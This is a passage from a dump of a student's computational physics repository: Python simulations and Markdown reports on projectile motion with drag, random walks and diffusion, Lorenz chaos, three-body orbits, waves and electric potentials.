V3[i][j]=-V1[N-1-i][N-1-j]\n#add the 4th qudrant to V3 using extend\nfor i in range(N):\n V3[i].extend(V1[N-1-i])\n#add the 1st&2nd qudrant using +\nV_whole=V3\nfor i in range(N-1):\n V_whole=V_whole+[V3[N-2-i]]\ndel V1,V3 \n \nx=np.linspace(-1,1,len(V_whole))\nX,Y= np.meshgrid(x,x)\nfig = plt.figure()\n\n\n#ax = Axes3D(fig)\n#ax.set_xlabel('x')\n#ax.set_ylabel('y')\n#ax.set_zlabel('Electric Potential/V')\n#ax.set_title('Electric Potential Distribution Near Two Metal Plates') \n#surf=ax.plot_surface(X,Y,V_whole, rstride=1, cstride=1, cmap=cm.viridis)\n#fig.colorbar(surf, shrink=0.5, aspect=5)\n#wframe = ax.plot_wireframe(X, Y, V_whole, rstride=2, cstride=2)\n#CS = plt.contour(X, Y, V_whole, 15, linewidths=0.5, colors='k')\n#CS = plt.contourf(X, Y, V_whole, 15)\nplt.xlabel('x')\nplt.ylabel('y')\n#plt.title('Electric Potential Distribution Near Two Metal Plates')\n#plt.colorbar() # draw colorbar\nEY,EX=np.gradient(V_whole)\nEX,EY=-EX,-EY\nplt.quiver(X,Y, EX, EY)\nplt.title('Electric field near two metal plates')\nplt.show()\n" }, { "alpha_fraction": 0.6306939125061035, "alphanum_fraction": 0.6939390301704407, "avg_line_length": 68.27825927734375, "blob_id": "a328fa6e59fc96793afcd1618caffaf2736cfcf6", "content_id": "20b140abe0eefcfefb9ddac4cb729833c9901ec0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7991, "license_type": "no_license", "max_line_length": 336, "num_lines": 115, "path": "/ch2.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "\n\n\n> Written with [StackEdit](https://stackedit.io/).\n# Chapter_two_section2.2\nproblem2.7&8\n\n贾雪巍 2015301020090\n\n----------\n\n\n## The Trajectory of a Cannon Shell\n------------------------------------\nConsider a projectile such as a shell shot by a cannon.If we ignore 
air resistance,the equation of motions can be obtained from Newton's second law.\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$&space;\\frac{d^2x}{dt^2}=0$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$&space;\\frac{d^2x}{dt^2}=0$$\" title=\"$$ \\frac{d^2x}{dt^2}=0$$\" /></a>\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$\\frac{d^2y}{dt^2}=-g$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$\\frac{d^2y}{dt^2}=-g$$\" title=\"$$\\frac{d^2y}{dt^2}=-g$$\" /></a>\nx and y are horizontal and vertical coordinates of the projectile.\nThese are second-order differential equations.If we recasting the equations in the following way.\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$\\frac{dx}{dt}=v_x$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$\\frac{dx}{dt}=v_x$$\" title=\"$$\\frac{dx}{dt}=v_x$$\" /></a>\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$\\frac{dv_x}{dt}=0$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$\\frac{dv_x}{dt}=0$$\" title=\"$$\\frac{dv_x}{dt}=0$$\" /></a>\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$\\frac{dy}{dt}=v_y$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$\\frac{dy}{dt}=v_y$$\" title=\"$$\\frac{dy}{dt}=v_y$$\" /></a>\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$\\frac{dv_y}{dt}=-g$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$\\frac{dv_y}{dt}=-g$$\" title=\"$$\\frac{dv_y}{dt}=-g$$\" /></a>\nWe can use Euler method to solve the problem.Then we add air resistance, air density,temperature,gravitational acceleration etc to the model to approach the realistic motion of the cannon and find out how much these factors affect the model.\n\n1.We will assume that the magnitude of the drag force on cannon shell is give by \n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$F_{drag}=-B_2v^2$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$F_{drag}=-B_2v^2$$\" title=\"$$F_{drag}=-B_2v^2$$\" /></a>\nwhere<a href=\"http://www.codecogs.com/eqnedit.php?latex=$v=\\sqrt{&space;v_x^2&plus;v_y^2}$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$v=\\sqrt{&space;v_x^2&plus;v_y^2}$\" title=\"$v=\\sqrt{ v_x^2+v_y^2}$\" /></a>is the speed of the shell.\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$F_{drag,x}=-B_2vv_x$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$F_{drag,x}=-B_2vv_x$$\" title=\"$$F_{drag,x}=-B_2vv_x$$\" /></a>\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$F_{drag,y}=-B_2vv_y$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$F_{drag,y}=-B_2vv_y$$\" title=\"$$F_{drag,y}=-B_2vv_y$$\" /></a>\n2.Air resistance is propotional to the density of the air,so the drag force at high altitude will be less.Treat the atmosphere as an adiabatic ideal gas which leads to that the density depends on altitude according to\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$\\rho=\\rho_0(1-\\frac{ay}{T_0})^\\alpha$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$\\rho=\\rho_0(1-\\frac{ay}{T_0})^\\alpha$$\" title=\"$$\\rho=\\rho_0(1-\\frac{ay}{T_0})^\\alpha$$\" /></a>\nWe replace <a href=\"http://www.codecogs.com/eqnedit.php?latex=$B_2$with$B_2\\rho/\\rho_0$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$B_2$with$B_2\\rho/\\rho_0$\" title=\"$B_2$with$B_2\\rho/\\rho_0$\" /></a>.\n$a\\approx6.5\\times{10^-}^3$K/m,$T_0$is the sea level 
temperature,$\\alpha\\approx2.5$for air\n\n3.Further incorporate the effects off the variation of the ground temperature by replacing<a href=\"http://www.codecogs.com/eqnedit.php?latex=$B_2$by$B_2^{ref}(T_0/T_{ref})^\\alpha$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$B_2$by$B_2^{ref}(T_0/T_{ref})^\\alpha$\" title=\"$B_2$by$B_2^{ref}(T_0/T_{ref})^\\alpha$\" /></a>\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$T_{ref}=300K$,$B_2^{ref}/m=4\\times10^{-5}m^{-1}$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$T_{ref}=300K$,$B_2^{ref}/m=4\\times10^{-5}m^{-1}$\" title=\"$T_{ref}=300K$,$B_2^{ref}/m=4\\times10^{-5}m^{-1}$\" /></a>\n\n4.Gravity decreases with altitude as one rises above the Earth's surface because greater altitude means greater distance from the Earth's centre.\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$g_h=g_0(\\frac{r_e}{r_e&plus;h})^2$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$g_h=g_0(\\frac{r_e}{r_e&plus;h})^2$$\" title=\"$$g_h=g_0(\\frac{r_e}{r_e+h})^2$$\" /></a>\nWhere\n\ngh is the gravitational acceleration at height h above sea level.\nre is the Earth's mean radius.\ng0 is the standard gravitational acceleration.\nThe formula treats the Earth as a perfect sphere with a radially symmetric distribution of mass; a more accurate mathematical treatment is discussed below(from wikipedia).\n## [Code](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch2.py)\n--------------------\n## Results and Analysis\n----------\n\n**1.Use the adiabatic model of air density**\n - when we ignore the air resistance. \n![Fig2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/2-2.png)\n - when we consider the air resistance and air density.\n ![Fig1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/2-1.png)\nWhen we consider air resistance,the trajectories change a lot.\nThe altitude the cannon can reach fall. 
\nCompare these two pic,we can see cannon's range reduce a lot .\n> - ignore air resistance\n![FIG](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/2-1range.png)\n 45.0 50049.491150831855\n> - cosider air densitr\n![fig4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/2-2range.png)\n43.199999999999996 24523.790443161008\n( numbers under the plot are the maximum range and the launch angle to achieve it.)\n---------------------\n\nThe maximum range reduce from 50049.49 to 24523.79(about51.0%)\nThe launch angle to achieve it also become smaller(from 45.0 to 43.2)\n\n\n----------\n\n\n**2.Incorporate the effects of the temperature**\n> - 253K\n ![Fig5](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/253.png)\n> - 303K\n![FIg6](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/303.png)\nAssume that the temperature in winter is 253K and the summer temperature is 303K.\nThe altitude the cannon can reach fall in summer .\nCompare these two pic,we can see cannon's range reduce .\n> - 253K\n ![FIG7](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/253range.png)\n > - 303K\n ![fig8](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/303range.png)\n( numbers under the plot are the maximum range and the launch angle to achieve it.)\n-----------------------\n\nThe maximum range reduce from30320.25to 24194.66 in summer.(about20.2%).However,both range in winter and summer fall a lot compared with 300K.\nThe launch angle to achieve it in winter is 43.2 which is closed to reference temperature.The angle in summer is 45.0 which is closed to the ideal condition.\n\n\n**3.Incorporate the effects of g**\n> - g\n![Fig9](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/g.png)\n> - gh\n![fig10](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/gh.png)\n> - g\n![fig11](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/g%20range.png)\n> - gh\n![fig12](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/gh%20range.png).\n---------------------------------\n\nIt seems that g has very little effect on the trajectory.\n\n--------\nPS.pygame\n已安装pygame\n\nimport pygame \nfrom pygame.locals import * \npygame.init() \npygame.display.set_mode((600,500)) 一直报错...(I'm still working on it!)\n\n\n" }, { "alpha_fraction": 0.6842184066772461, "alphanum_fraction": 0.767899751663208, "avg_line_length": 54.858333587646484, "blob_id": "6549f5606ca33ec91f59f444d826254519afa02f", "content_id": "d18645b814759735fc410b5b941205030e4d058a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6714, "license_type": "no_license", "max_line_length": 610, "num_lines": 120, "path": "/final/Random Systems.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "# Random Systems\n\nName:贾雪巍 \n\nStudent number:201530120090\n\n## Random Walks&Diffusion\n\n1.Random walk is a model describes a process in which a walker moves one step a time,according to certain rules.The simplest situation involves a walker that is able to take steps of length unity along a line.The walker begins at the origin.Each step can be towards right or left with equal probability.We can stimulate the displacement of the walker after N steps(time).Use the Monte Carlo sampling.First generate a random number between 0 and 1 and determine the 
direction of the step.We can also calculate the mean displacement and the average of square of the displacement and the 2 or 3 dimensional cases.\n\n2.Random walks are equivalent to diffusion.Consider the density of particles(walkers).The density is propotional to the probablity per unit volume P(x,y,z,t).We'll see the density and P obey the same equation.On a simple cubic lattice,the total probablity to arrive at (i,j,k) is P(i,j,k,n)=1/6[P(i+1,j,k,n-1)+P(i,j,k,t)+P(i-1,j,k,n-1)+P(i,j+1,k,n-1)+P(i,j-1,k,n-1)+P(i,j,k-1,n-1)].Rearranging and taking the continuum limit, it suggests that\n\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{\\partial&space;P(x,y,z,t)}{\\partial&space;t}=D&space;\\nabla^2P(x,y,z,t)\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{\\partial&space;P(x,y,z,t)}{\\partial&space;t}=D&space;\\nabla^2P(x,y,z,t)\" title=\"\\frac{\\partial P(x,y,z,t)}{\\partial t}=D \\nabla^2P(x,y,z,t)\" /></a>\n\nIf we know the initial distribution we'll get the solution at future times.\n\n3. Recall that the statistical definition of entropy is \n\n <a href=\"http://www.codecogs.com/eqnedit.php?latex=S=-\\sum_{i}P_ilnP_i\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?S=-\\sum_{i}P_ilnP_i\" title=\"S=-\\sum_{i}P_ilnP_i\" /></a>\n\n Divide the system into a square grid.State i correspond to the particles in the cell i at any particular time and Pi is the probability of finding the particle in this cell at particular time.\n\n## [Codes](https://github.com/jxw666/computationalphysics_N2015301020090/tree/master/final)\n\n## Results&Anylasis\n\n 1.One dimensional random walk\n\n ![1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/1.png)\n\nHere I draw two walker's displacements versus time\n\nThe following figures are get from the average of 5000 walkers.\n\n![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/2.png)\n\nWe can see that the mean displacement is close to zero as expected.Because it's equal likely to go left and right.\n\n![3](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/3.png)\n\nWe see that the averages of the square of the displacement is well described by a straight line.The RED line is the stimulation of the dots.Y=0.989960976898X+0.315882666666.\n\nFor a free particle x=vt.So a random walker escapes from the origin more slowly(square root of t).\n\nN steps one dimensional random walk is a **Binomial distribution.** From the math we have learned we can easily know that\n\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=\\sigma_n^2=\\overline{(\\Delta&space;n)^2}=Npq\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\sigma_n^2=\\overline{(\\Delta&space;n)^2}=Npq\" title=\"\\sigma_n^2=\\overline{(\\Delta n)^2}=Npq\" /></a>\n\nOur textbook,to explain this result,suggests that we can write the position xn as a sum of n separate i th step,then write the square displacement.Finally we reach that the slope of the curve is 1.\n\nUse the same method the average of x^4 is\n\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=<x^4>=3n^2-2n\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?<x^4>=3n^2-2n\" title=\"<x^4>=3n^2-2n\" /></a>\n\nhere's the result I got\n\n![4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/4.png)\n\n\n\n​\t\t\t\n​\t\tThe RED line is y=2.94218790678x^2 -6.59728183121x+ 63.7786218824 .I think <x4> can be very large (we can see from the 
figure).So the difference between the ideal one and the result I got is acceptable.\n\n2.one dimensional but random length\n\n![5](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/5.png)\n\n![6](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/6.png)\n\nThe mean average is also close to zero.\n\n![7](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/7.png)\n\nThe RED line is y=0.346211421082x -0.0849232487711\n\n![8](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/8.png)\n\nThe RED line is y=2.94218790678x^2 -6.59728183121x+ 63.7786218824\n\n3.two&three dimensions\n\n![9](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/9.png)\n\n![10](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/10.png)\n\nThe stimulation result is y=1.01732169697x+0.22355830303\n\n![11](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/11.png)\n\n\n\n![12](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/12.png)\n\nThe stimulation result is y=1.62234589019 x-0.981333454546\n\n4.From the **central limit theorem** we know for large number particles their distributions should approximate to a Gaussian distribution.You can also verify that a Gaussian distribution obeys the diffusion equation.\n\nSet all particle at the center at the beginning, then let them do random walk in one dimension .For 1000 walkers after 10,100,500,2000,4000,8000 time steps we get\n\n![13](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/13.png)\n\nWe can see how the particles diffuse in this way without knowing the details of particles' motion.\n\n5.Consider two dimension random walk problem. First we set a number of particle in the center area which is shaped as a square. Then let them do random walk to up,down,left and right in four directions. The only limit is once they are reach the edge of the area they can not pass it. Then we observe the whole random particle picture in different time.\n\n![14](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/14.png)\n\nThen calculate the entropy we get\n\n![entropy](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/entropy.png)\n\nDuring the process th entropy increase and seemingly is going to approach a constant value.This illustrates how a closed system approaches equilibrium.\n\n## Acknowledgement\n\n1.Qiangyu,a former student of our computational course.I refered part of his codes,especially about the diffusion problem.\n\n2.Wikipedia,Random walk\n\n3.Computational Physics, Nicholas J. 
Giordano & Hisao Nakanishi \n" }, { "alpha_fraction": 0.39834025502204895, "alphanum_fraction": 0.4655601680278778, "avg_line_length": 23.5744686126709, "blob_id": "f9b29d00ffadad6b7b4b6257503ec5d9362c13d3", "content_id": "cdcac31fa3dbef2889211b70fec1ddb47676cecd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1239, "license_type": "no_license", "max_line_length": 42, "num_lines": 47, "path": "/homework8/code/a=0.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import math\nimport matplotlib.pyplot as plt\ndef billiard(x0,y0,vx0,vy0,r,time):\n x=[x0]\n y=[y0]\n vx=vx0\n vy=vy0\n t=[0]\n dt=0.01\n T=0\n while T<=time:\n x.append(x[-1]+vx*dt)\n y.append(y[-1]+vy*dt)\n t.append(t[-1]+dt)\n if (x[-1]**2+y[-1]**2)>r**2:\n d=math.sqrt(x[-1]**2+y[-1]**2)\n d1=2*r-d##这里借鉴了强雨的代码,对坐标进行修正\n x.append(x[-1]*d1/d)\n y.append(y[-1]*d1/d)\n t.append(t[-1]+dt)\n cs=x[-1]/d \n ss=y[-1]/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n T=t[-1]\n return x,y\ndef circle(r1):\n x1=[]\n y1=[]\n theta=[]\n theta.append(0)\n tu=2*math.pi/10000\n for j in range(10000):\n x1.append(r1*math.cos(theta[-1]))\n y1.append(r1*math.sin(theta[-1]))\n theta.append(theta[-1]+tu)\n return x1,y1\nfig = plt.figure(figsize=(7, 7))\nB=billiard(0.5,0.5,-0.4,-0.3,1,500)\nplt.plot(B[0],B[1],'k:')\na1,b1=circle(1.0)\nplt.plot(a1,b1,color='black') \nplt.xlabel('x')\nplt.ylabel('y')\nplt.title('Circular stadium-trajectory')\n \n \n \n \n \n " }, { "alpha_fraction": 0.4588682949542999, "alphanum_fraction": 0.5306704640388489, "avg_line_length": 32.39682388305664, "blob_id": "02afbb6a89400f40d047229a60d94e954b6049f8", "content_id": "82ef12ad58c97f0d2f2541f04629361647385dff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2103, "license_type": "no_license", "max_line_length": 197, "num_lines": 63, "path": "/ch4/ch4.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import math\nimport matplotlib.pyplot as plt\nMS=2*10**30\nMJ=1.9*10**27*10\nME=6*10**24\na=(6*10**24+5.2*1.9*10**27)/(2*10**30+6*10**24+1.9*10**27)\nb=((1-a)*2*math.pi*6*10**24+1.9*10**27*2*math.pi*(5.2-a)/math.sqrt(5.2))/(2*10**30*a)\nc=(2*math.pi*ME+2*math.pi*MJ/math.sqrt(5.2))/(ME+MS+MJ)\nJX=[5.2-a]\nEX=[1-a]\nSX=[0-a]\nJY=[0]\nEY=[0]\nSY=[0]\nCOMX=[0]\nCOMY=[0]\nvex=0\nvey=2*math.pi\nvjx=0\nvjy=2*math.pi/math.sqrt(5.2)\nvsx=0\nvsy=0\nt=0\ndt=0.01\ni=0\nwhile t<=100:\n re_s=math.sqrt((EX[i]-SX[i])**2+(EY[i]-SY[i])**2)\n re_j=math.sqrt((EX[i]-JX[i])**2+(EY[i]-JY[i])**2)\n rs_j=math.sqrt((SX[i]-JX[i])**2+(SY[i]-JY[i])**2)\n vex_dt=vex-(4*math.pi**2*(EX[i]-SX[i])/re_s**3-4*math.pi**2*(MJ/MS)*(EX[i]-JX[i])/re_j**3)*dt\n vey_dt=vey-(4*math.pi**2*(EY[i]-SY[i])/re_s**3-4*math.pi**2*(MJ/MS)*(EY[i]-JY[i])/re_j**3)*dt\n vjx_dt=vjx-(4*math.pi**2*(JX[i]-SX[i])/rs_j**3-4*math.pi**2*(ME/MS)*(JX[i]-EX[i])/re_j**3)*dt \n vjy_dt=vjy-(4*math.pi**2*(JY[i]-SY[i])/rs_j**3-4*math.pi**2*(ME/MS)*(JY[i]-EY[i])/re_j**3)*dt \n vsx_dt=vsx-(4*math.pi**2*(ME/MS)*(SX[i]-EX[i])/re_s**3-4*math.pi**2*(MJ/MS)*(SX[i]-JX[i])/rs_j**3)*dt \n vsy_dt=vsy-(4*math.pi**2*(ME/MS)*(SY[i]-EY[i])/re_s**3-4*math.pi**2*(MJ/MS)*(SY[i]-JY[i])/rs_j**3)*dt \n COMX.append(0)\n COMY.append(COMY[i]+c*dt)\n EX.append(EX[i]+vex_dt*dt)\n EY.append(EY[i]+vey_dt*dt-c*dt)\n JX.append(JX[i]+vjx_dt*dt)\n JY.append(JY[i]+vjy_dt*dt-c*dt)\n SX.append(SX[i]+vsx_dt*dt)\n SY.append(SY[i]+vsy_dt*dt-c*dt) 
\n\n vex=vex_dt\n vey=vey_dt\n vsx=vsx_dt\n vsy=vsy_dt\n vjx=vjx_dt\n vjy=vjy_dt\n i=i+1\n t=t+dt\nfig = plt.figure(figsize=(7, 7)) \nplt.plot(EX,EY,linewidth='0.1',color='blue',label='Earth')\nplt.plot(SX,SY,linewidth='1',color='red',label='Sun')\nplt.plot(JX,JY,linewidth='1',color='black',label='Jupiter')\n#plt.plot(COMX,COMY,color='yellow',linewidth='2')\n#plt.grid()\nplt.xlabel('x/AU')\nplt.ylabel('y/AU')\nplt.title('3-body simulation Earth&Jupiter&Sun')\nplt.legend()\nplt.show()" }, { "alpha_fraction": 0.4736328125, "alphanum_fraction": 0.5751953125, "avg_line_length": 21.755556106567383, "blob_id": "c9902a0a56d361576f0ee14b3c60418b6ca68a28", "content_id": "4b457c6d126d9db638401326971e68553339bd46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1024, "license_type": "no_license", "max_line_length": 70, "num_lines": 45, "path": "/ch6/ch6.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import math\nimport numpy as np\nimport matplotlib.pyplot as plt\ndelta_x=0.01\nc=300\ndelta_t=3.5*10**(-5)#delta_x/c#2*10**(-5)#3.33*10**(-5)delta_x/c\nr=c*delta_t/delta_x\nx=np.linspace(0,1,int(1/delta_x)+1)\nk0,x0=1000,0.3\ny_initial=[]\nfor i in range(1+int(1/delta_x)):\n y_initial.append(math.exp(-k0*(i*delta_x-x0)**2))\ny1=y_initial\ny2=y_initial\nfor i in range(11):\n y3=[0]\n for j in range(1,len(y2)-1):\n y3.append((2*(1-r**2)*y2[j]-y1[j]+r**2*(y2[j-1]+y2[j+1])))\n y3.append(0)\n y1=y2\n y2=y3\n\n\nn_step=11\nn_plot=11\nplt.figure(figsize=(10,10))\nplt.subplot(n_plot,1,1)\nplt.plot(x,y_initial,color='blue')\nplt.title('Waves On A String With Fixed Ends')\nfor i in range(n_plot-1):\n plt.subplot(n_plot,1,i+2)\n plt.plot(x,y1,color='blue')\n #plt.xlabel('x')\n #plt.figure(figsize=(7, 7))\n for i in range(11):\n y3=[0]\n for j in range(1,len(y2)-1):\n y3.append((2*(1-r**2)*y2[j]-y1[j]+r**2*(y2[j-1]+y2[j+1])))\n y3.append(0)\n y1=y2\n y2=y3\n\n \n\nplt.show()\n" }, { "alpha_fraction": 0.668713390827179, "alphanum_fraction": 0.7446274161338806, "avg_line_length": 78.62222290039062, "blob_id": "c05d9ea44c7a9a0f3c74623d58fcae50417dd814", "content_id": "352c4dd7ed2f45f89400cb2773473df630a368bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3585, "license_type": "no_license", "max_line_length": 699, "num_lines": 45, "path": "/Ch3/lorenz.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "\n\n\n> Written with [StackEdit](https://stackedit.io/).\n# Chapter_two_section3.6-The Lorenz Model\n-------------\nproblem3.26&27\n\n--------\n## Background\n-------\n\nE.N.Lorenz atmospheric scientist(not Lorentz!) 
studied the Navier-Stokes equations and the Rayleigh-Benard problem,which concerns a fluid in a container whose top and bottom surfaces are held at different temperatures.It had long been know that as the difference between these two temperature is increased, the fluid can undergo transitions from a stationary state to steady flow to chaotic flow.He considered a **greatly simplified** version of Navier-Stokes equationas as applied to this particular problem.He grossly oversimplified the problem as he reduced it to only three equations\n <a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{dx}{dt}=\\sigma(y-x)\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{dx}{dt}=\\sigma(y-x)\" title=\"\\frac{dx}{dt}=\\sigma(y-x)\" /></a>,\n <a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{dy}{dt}=-xz&plus;rx-y\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{dy}{dt}=-xz&plus;rx-y\" title=\"\\frac{dy}{dt}=-xz+rx-y\" /></a>,\n <a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{dz}{dt}=xy-bz\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{dz}{dt}=xy-bz\" title=\"\\frac{dz}{dt}=xy-bz\" /></a>.\n x,y,z are derived from the temperature density and velocity variables from Rayleigh-Benard problem,and the sigma, r,b are the measures of of temperature difference and other fluid parameters. In the following analysis,we'll take<a href=\"http://www.codecogs.com/eqnedit.php?latex=\\sigma=10,b=8/3\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\sigma=10,b=8/3\" title=\"\\sigma=10,b=8/3\" /></a>.From our text book we know the transition from steady convection to chaotic behavior takes place at<a href=\"http://www.codecogs.com/eqnedit.php?latex=r=470/19\\approx24.74\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?r=470/19\\approx24.74\" title=\"r=470/19\\approx24.74\" /></a>.\n We again use Euler method to solve this problem.\n\n\n-------\n## [Code](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/lorenz.py)\n-----\n## Results&Analysis\n-------------\n1.Phase-space\nConstruct a phase-space plot model for the Lorenz model.Imagine that x,y and z are coordinates in some abstract space.\nr=2, steady\n![r=2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/r%3D2.png)\n![r=10](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/r%3D10.png)\n![r=15](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/r%3D15.png)\n![r=20](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/r%3D20.png)\n![r=30](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/r%3D30.png)\n![r=50](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/r%3D50.png)\n![r=100](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/r%3D100.png)\nWhen r is small,the system is steady.When r=20,the system is chaotic,not r=25.However,when r is greater,the chaos seems to disappear???\n\n-----------\n2.Poincatr sections\nConsider the two-dimensional slices\nx(0)=1,y(0)=z(0)=0\n![1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/poin1.png)\nx(0)=0,y(0)=z(0)=1\n![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/poin2.png)\nPoincare sections are independent of the initial conditions.\n" }, { "alpha_fraction": 0.7202531695365906, "alphanum_fraction": 0.7943037748336792, 
"avg_line_length": 59.57692337036133, "blob_id": "d18c22a78ee6b87aff2ec5f968defa01fa0bdc26", "content_id": "a09f31e0725ec942e840909cb1559e48fa29fb41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1580, "license_type": "no_license", "max_line_length": 692, "num_lines": 26, "path": "/CH5/Electric Potentials .md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "# Electric Potentials \n\nProblem 5.3\n\n## Bacground\n\nThe reigons of space that do not contain any electric charges,the potential obeys Laplace's equation(PDE).We'll use the **relaxation method** to solve the equation numerically.After the approximaton we get the value of the potential at any point is the average of potential at all of the neighbor points(assume that the step sizes along every axis are equal).If we know the value at boundaries ,we make an initial guess for the solution.Then calculate an improved guess by the relation we get.Then repeat the procedure.This iterative process continues until satisfy some conditions.This approach is called the relaxation method.The algorithm ,our textbook says, is known as the Jacobi method.\n\nProblem5.3consider the potential between two parallel capacitor plates.And based on the symmetry ,we just need to calculate the result in one quadrant of the x-y plane.\n\n![1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/CH5/1.png)\n\n## [Code](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/CH5/ch5.py)\n\n## Results&Analysis\n\n![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/CH5/2.png)\n\n![2'](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/CH5/2'.png)\n\n![3](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/CH5/3.png)\n\n![4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/CH5/4.png)\n## Acknowlegement\n\nI want to thank Junyi Shangguan.Her method to set the potential is awesome!\n\n\n\n\n\n" }, { "alpha_fraction": 0.417391300201416, "alphanum_fraction": 0.8695651888847351, "avg_line_length": 115, "blob_id": 